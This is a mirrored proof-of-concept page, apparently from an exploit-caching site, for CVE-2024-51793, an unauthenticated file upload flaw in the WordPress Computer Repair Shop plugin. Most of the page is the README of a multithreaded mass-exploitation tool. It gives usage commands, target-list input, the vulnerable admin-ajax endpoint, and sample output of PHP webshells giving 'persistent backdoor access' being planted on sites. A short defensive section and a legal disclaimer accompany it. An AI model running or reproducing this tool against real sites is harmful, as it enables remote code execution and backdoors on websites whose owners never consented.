Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-51793 PoC — WordPress plugin Computer Repair Shop 代码问题漏洞

Source
https://github.com/0axz-tools/CVE-2024-51793
Associated Vulnerability
Title:WordPress plugin Computer Repair Shop 代码问题漏洞 (CVE-2024-51793)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Computer Repair Shop 3.8115版本及之前版本存在代码问题漏洞,该漏洞源于包含一个危险类型文件上传不受限制漏洞。
Readme
CVE-2024-51793 Exploit Tool Documentation
📋 Overview
CVE-2024-51793 is an unauthenticated arbitrary file upload vulnerability in the Computer Repair Shop WordPress plugin (versions prior to 3.8116). This vulnerability allows attackers to upload arbitrary files, including PHP webshells, without authentication, leading to remote code execution on vulnerable WordPress sites.

🚨 Vulnerability Details
CVE ID: CVE-2024-51793

Vulnerability Type: Unauthenticated Arbitrary File Upload

Affected Plugin: Computer Repair Shop WordPress Plugin

Affected Versions: < 3.8116

Risk Level: Critical (CVSS Score: 9.8)

🔧 Technical Details
The vulnerability exists in the wc_upload_file_ajax action handler in the plugin, which fails to properly validate file types and user authentication, allowing unauthenticated attackers to upload malicious files directly to the server.

📦 Installation & Requirements
Prerequisites
Python 3.6+

Required packages: requests

Installation
bash
# Clone or download the script
git clone <repository-url>
cd cve-2024-51793-exploit

# Install required packages
pip install requests

# Or if you have requirements.txt
pip install -r requirements.txt
🛠️ Usage Guide
Basic Usage
bash
python3 cve_2024_51793_exploit.py -l targets.txt -t 50
Advanced Usage
bash
# With custom output directory
python3 cve_2024_51793_exploit.py -l targets.txt -t 100 -o results

# With verbose output (if implemented)
python3 cve_2024_51793_exploit.py -l urls.txt -t 50 --verbose
Command Line Arguments
Argument	Short	Description	Default
--list	-l	Path to file containing target URLs (required)	-
--threads	-t	Number of concurrent threads	50
--output	-o	Output directory for results	results
Input File Format
Create a text file (targets.txt) with one URL per line:

text
example.com
https://vulnerable-site.com
http://192.168.1.100/wordpress
test-site.org/blog
🔍 How It Works
1. Target Validation
The script first checks if the target is running the vulnerable plugin version by examining:

text
/wp-content/plugins/computer-repair-shop/readme.txt
2. Version Detection
It verifies the plugin contains "CRM WordPress Plugin" and the version is below 3.8116.

3. Exploitation
If vulnerable, the script uploads a PHP webshell via:

text
POST /wp-admin/admin-ajax.php?action=wc_upload_file_ajax
4. Webshell Payload
The uploaded webshell provides:

File upload capability

Basic file management

Persistent backdoor access

📊 Output Files
The tool generates two main output files:

vulnerable_targets.txt - List of confirmed vulnerable URLs

webshells.txt - List of successfully uploaded webshell URLs

🎯 Example Execution
bash
$ python3 cve_2024_51793_exploit.py -l targets.txt -t 30

    ╔══════════════════════════════════════════════════════════════╗
    ║                                                              ║
    ║  CVE-2024-51793 Exploit Tool                                ║
    ║  Unauthenticated RCE in Computer Repair Shop WP Plugin      ║
    ║                                                              ║
    ╚══════════════════════════════════════════════════════════════╝
    
 [ INFO ] Loaded 150 unique targets
 [ INFO ] Starting scan with 30 threads
 
 [ SCANNING ] Checking: http://example.com/
 [ VULNERABLE ] Target identified: http://example.com/
 [ SUCCESS ] Shell uploaded: http://example.com/wp-content/uploads/2024/05/3287428974_ktn.php
 
 [ SCANNING ] Checking: http://testsite.com/
 [ NOT VULNERABLE ] Target: http://testsite.com/
 
 [ COMPLETED ] Scan finished successfully
🛡️ Defensive Measures
For Website Owners
Immediate Actions:

Update Computer Repair Shop plugin to version 3.8116 or later

Remove any uploaded malicious files

Scan for existing compromises

Preventive Measures:

Implement web application firewalls (WAF)

Regular security audits

File integrity monitoring

For Security Researchers
Use only in authorized environments

Follow responsible disclosure practices

Obtain proper permissions before testing

⚠️ Legal & Ethical Considerations
This tool is for educational and authorized security testing only

Unauthorized use against systems you don't own is illegal

Always obtain proper authorization before penetration testing

Follow responsible disclosure practices for found vulnerabilities

🔄 Maintenance
Updates
Regularly check for:

Script updates and improvements

Changes in vulnerability status

New detection methods

Troubleshooting
Common issues and solutions:

Connection Timeouts: Increase timeout values in session configuration

False Negatives: Verify target URLs are accessible

Rate Limiting: Reduce thread count and add delays

📞 Support
For issues and improvements:

Create issues on the project repository

Contact: TG: @KtN_1990

📚 References
CVE-2024-51793 Official Entry

WordPress Plugin Directory

[Security Advisory References]

Disclaimer: This tool should only be used for legitimate security research and authorized penetration testing. The authors are not responsible for any misuse or damage caused by this tool.
File Snapshot

 [4.0K]  /data/pocs/af1ba0692a01986437c111b927af2121210b13e4
├── [10.0K]  CVE-2024-51793.py
└── [5.2K]  README.md

1 directory, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.